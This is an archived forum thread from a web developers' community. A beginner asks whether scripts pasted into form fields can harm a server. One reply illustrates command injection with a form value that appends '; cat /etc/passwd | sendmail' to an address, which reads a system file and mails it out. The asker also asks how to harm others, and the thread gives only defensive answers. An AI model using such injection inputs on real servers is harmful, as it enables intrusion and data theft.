473,395 Members | 1,999 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

Join Bytes to post your question to a community of 473,395 software developers and data experts.

hack script and forms

Hi all

what is it about that some one can paste script in the form field and
submit the form and than what?

can some one open my ice about that
I like to know the bead and the good things about it

Thanks
Jul 20 '05 #1
8 6389

"steve" <NO****************@hotmail.com> wrote in message
news:bq**********@ctb-nnrp2.saix.net...
Hi all

what is it about that some one can paste script in the form field and
submit the form and than what?

can some one open my ice about that
I like to know the bead and the good things about it

Thanks


Hmmmm... I am guessing that this is a poor translation, because I have no
idea what you are asking... sorry.
Jul 20 '05 #2
Lee
Brian said:


"steve" <NO****************@hotmail.com> wrote in message
news:bq**********@ctb-nnrp2.saix.net...
Hi all

what is it about that some one can paste script in the form field and
submit the form and than what?

can some one open my ice about that
I like to know the bead and the good things about it

Thanks


Hmmmm... I am guessing that this is a poor translation, because I have no
idea what you are asking... sorry.


I think he was trying to be clever.
open my ice = "open my eyes".

Jul 20 '05 #3

"Lee" <RE**************@cox.net> wrote in message
news:bq*********@drn.newsguy.com...
Brian said:


"steve" <NO****************@hotmail.com> wrote in message
news:bq**********@ctb-nnrp2.saix.net...
Hi all

what is it about that some one can paste script in the form field and
submit the form and than what?

can some one open my ice about that
I like to know the bead and the good things about it

Thanks


Hmmmm... I am guessing that this is a poor translation, because I have no
idea what you are asking... sorry.


I think he was trying to be clever.
open my ice = "open my eyes".


Yeah, I read it that way... I still dont know what he is asking, and it is
likely the case for the other readers of this group.

Brian
Jul 20 '05 #4
Lee
Brian said:


"Lee" <RE**************@cox.net> wrote in message
news:bq*********@drn.newsguy.com...
Brian said:
>
>
>"steve" <NO****************@hotmail.com> wrote in message
>news:bq**********@ctb-nnrp2.saix.net...
>> Hi all
>>
>> what is it about that some one can paste script in the form field and
>> submit the form and than what?
>>
>> can some one open my ice about that
>> I like to know the bead and the good things about it
>>
>> Thanks
>>
>>
>
>Hmmmm... I am guessing that this is a poor translation, because I have no
>idea what you are asking... sorry.


I think he was trying to be clever.
open my ice = "open my eyes".


Yeah, I read it that way... I still dont know what he is asking, and it is
likely the case for the other readers of this group.


Oh. I understood the poorly-written question immediately, but my
first impression had been that "open my ice" was a mistranslation,
so I assumed that it was what was confusing you, too.

He seems to be asking if it's true that a badly written server-side
script can be coerced into executing code entered into form fields.

Yes. He should read up on web server security.

Jul 20 '05 #5
620

"Brian" <Br**********@nospam.yahoo.com> wrote in message
news:3f********@10.10.0.241...

"Lee" <RE**************@cox.net> wrote in message
news:bq*********@drn.newsguy.com...
Brian said:


"steve" <NO****************@hotmail.com> wrote in message
news:bq**********@ctb-nnrp2.saix.net...
> Hi all
>
> what is it about that some one can paste script in the form field and> submit the form and than what?
>
> can some one open my ice about that
> I like to know the bead and the good things about it
>
> Thanks
>
>

Hmmmm... I am guessing that this is a poor translation, because I have noidea what you are asking... sorry.


I think he was trying to be clever.
open my ice = "open my eyes".


Yeah, I read it that way... I still dont know what he is asking, and it is
likely the case for the other readers of this group.

Brian


....in other words, what's this I hear about people putting script (i.e.,
"var x = 0 / 0;") into the textbox of a form and submitting the form. What
happens thereafter, someone explain it to me, and what are the good and...
bead things about it.

And the answer is:

In order to open the Closed Eye of the Ice Demon, you'll need a Bottled Fire
Elemental (get that in the linux/apache ng). Once the Eye is open, you take
your Beads of the Deliquent Monk that you get in this ng and wrap them
around the Ancient Staff of Warding (I have no idea where you get an ASoW
these days, check google). Once the Beads are on the Staff, a localised
blaze will ignite on the staff, about 3/4 of the way up. Let it burn itself
out. A charred, round depression (socket) will be left. Put the Open eye
into the charred socket. This creates the Visionary Staff of Deliquency.
Come back and see me after you've obtained the staff and I'll show you how
to smite a form with it.
Jul 20 '05 #6

"Lee" <RE**************@cox.net> wrote in message
news:bq*********@drn.newsguy.com...
Brian said:


"Lee" <RE**************@cox.net> wrote in message
news:bq*********@drn.newsguy.com...
Brian said:
>
>
>"steve" <NO****************@hotmail.com> wrote in message
>news:bq**********@ctb-nnrp2.saix.net...
>> Hi all
>>
>> what is it about that some one can paste script in the form field and >> submit the form and than what?
>>
>> can some one open my ice about that
>> I like to know the bead and the good things about it
>>
>> Thanks
>>
>>
>
>Hmmmm... I am guessing that this is a poor translation, because I have no >idea what you are asking... sorry.

I think he was trying to be clever.
open my ice = "open my eyes".


Yeah, I read it that way... I still dont know what he is asking, and it islikely the case for the other readers of this group.


Oh. I understood the poorly-written question immediately, but my
first impression had been that "open my ice" was a mistranslation,
so I assumed that it was what was confusing you, too.

He seems to be asking if it's true that a badly written server-side
script can be coerced into executing code entered into form fields.

Yes. He should read up on web server security.


Oh, in that case, the poster should stop being cute, and get to the point.
Basically, the answer is yes... it is very easy to screw with a badly
written server-side script.

For instance, let's say your script does something like:

exec("SomeShellFunction " + formValue + " someParamater");

and the user enters : something ; cat /etc/passwd | sendmail
ya***@yahoo.com;

That is a very simple example of making a mess, and finding all of the users
on the server :)

A good way to _start_ to prevent it, is to do some server-side variable
checking, and stripping illegal characters, such as ";`'@$ etc.

B

Jul 20 '05 #7
> >> >> Hi all
>>
>> what is it about that some one can paste script in the form field and >> submit the form and than what?
>>
>> can some one open my ice about that
>> I like to know the bead and the good things about it
>>
>> Thanks
>>
>>
>
>Hmmmm... I am guessing that this is a poor translation, because I have no >idea what you are asking... sorry.

I think he was trying to be clever.
open my ice = "open my eyes".


Yeah, I read it that way... I still dont know what he is asking, and it islikely the case for the other readers of this group.


Oh. I understood the poorly-written question immediately, but my
first impression had been that "open my ice" was a mistranslation,
so I assumed that it was what was confusing you, too.

He seems to be asking if it's true that a badly written server-side
script can be coerced into executing code entered into form fields.

Yes. He should read up on web server security.


Sorry about my English
I did not try to be clever, I just wont to know as Lee gas how does
that work and does it effect the server or the user computer.

For example I have a web page .html with a form in site using form to
mail function.
What script can some body use to harm me or the server.
How can I protect myself from such scripts
and on the other hand
How can I use such script to harm somebody's computer or a server.

Thanks and I hope that you guys understand my English
Jul 20 '05 #8
Lee
steve said:
Sorry about my English
Sorry about guessing incorrectly.
I did not try to be clever, I just wont to know as Lee [guess] how does
that work and does it effect the server or the user computer.
The server.
For example I have a web page .html with a form in site using form to
mail function.
What script can some body use to harm me or the server.
How can I protect myself from such scripts


If you're using a form to mail function provided by your ISP or some
other site, then you (and they) should be safe. People don't usually
have much need to write their own, so I'm assuming that's the case.

Jul 20 '05 #9

This thread has been closed and replies have been disabled. Please start a new discussion.

Similar topics

5
by: Mike | last post by:
I'm using a script provided by e-mailanywhere, it's a little too big for me. There's 1 text field and 1 password field in a form. OnSubmit, I would like both fields to be validated to look for...
6
by: Luigi | last post by:
Another bug in IE 6 win. The posted page shows the error. They are four: 1) on the top edge, the upper margin of the container is not added with the body's padding. Instead it seems the two...
4
by: Angelos | last post by:
Hi, Because I am fed up with attacks on my form mail scripts I want to find a way to hack them my self and test it while I am developing it.... Does anyone knows a good resource to learn how...
2
by: Luciano A. Ferrer | last post by:
Well, our wiki (using wacko wiki, a nice light wiki) is being spammed a lot... I tryied to implement this hack http://wackowiki.com/CapTcha?v=zbz but it is just working partially... you can see...
2
by: Bundy | last post by:
Hi On my webpages I have replaced the submit button with a rolling submit button using the script below (Script 1). This script is used by many of my webpages and is included in a external...
3
by: uremog | last post by:
I have a set of of check boxes. onClick, the checkboxes call check_radio and recup_checkbox. the referenced radios function as group selectors. check_radio just unchecks the radios if someone...
12
by: Ivo | last post by:
I am programming forum. Tech is ASP.NET, C# and SQL Server 2005. I want to see is my site safe, have I made some security problems. Can you try to hack my site untill 10-september-2007.:...
1
by: Erik Jones | last post by:
So, I was just taking a look at doctest.py and saw this: Then running the module as a script will cause the examples in the docstrings to get executed and verified: python M.py This won't...
0
by: ryjfgjl | last post by:
In our work, we often receive Excel tables with data in the same format. If we want to analyze these data, it can be difficult to analyze them because the data is spread across multiple Excel files...
0
by: emmanuelkatto | last post by:
Hi All, I am Emmanuel katto from Uganda. I want to ask what challenges you've faced while migrating a website to cloud. Please let me know. Thanks! Emmanuel
0
BarryA
by: BarryA | last post by:
What are the essential steps and strategies outlined in the Data Structures and Algorithms (DSA) roadmap for aspiring data scientists? How can individuals effectively utilize this roadmap to progress...
1
by: Sonnysonu | last post by:
This is the data of csv file 1 2 3 1 2 3 1 2 3 1 2 3 2 3 2 3 3 the lengths should be different i have to store the data by column-wise with in the specific length. suppose the i have to...
0
by: Hystou | last post by:
There are some requirements for setting up RAID: 1. The motherboard and BIOS support RAID configuration. 2. The motherboard has 2 or more available SATA protocol SSD/HDD slots (including MSATA, M.2...
0
Oralloy
by: Oralloy | last post by:
Hello folks, I am unable to find appropriate documentation on the type promotion of bit-fields when using the generalised comparison operator "<=>". The problem is that using the GNU compilers,...
0
jinu1996
by: jinu1996 | last post by:
In today's digital age, having a compelling online presence is paramount for businesses aiming to thrive in a competitive landscape. At the heart of this digital strategy lies an intricately woven...
0
by: Hystou | last post by:
Overview: Windows 11 and 10 have less user interface control over operating system update behaviour than previous versions of Windows. In Windows 11 and 10, there is no way to turn off the Windows...
0
tracyyun
by: tracyyun | last post by:
Dear forum friends, With the development of smart home technology, a variety of wireless communication protocols have appeared on the market, such as Zigbee, Z-Wave, Wi-Fi, Bluetooth, etc. Each...

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.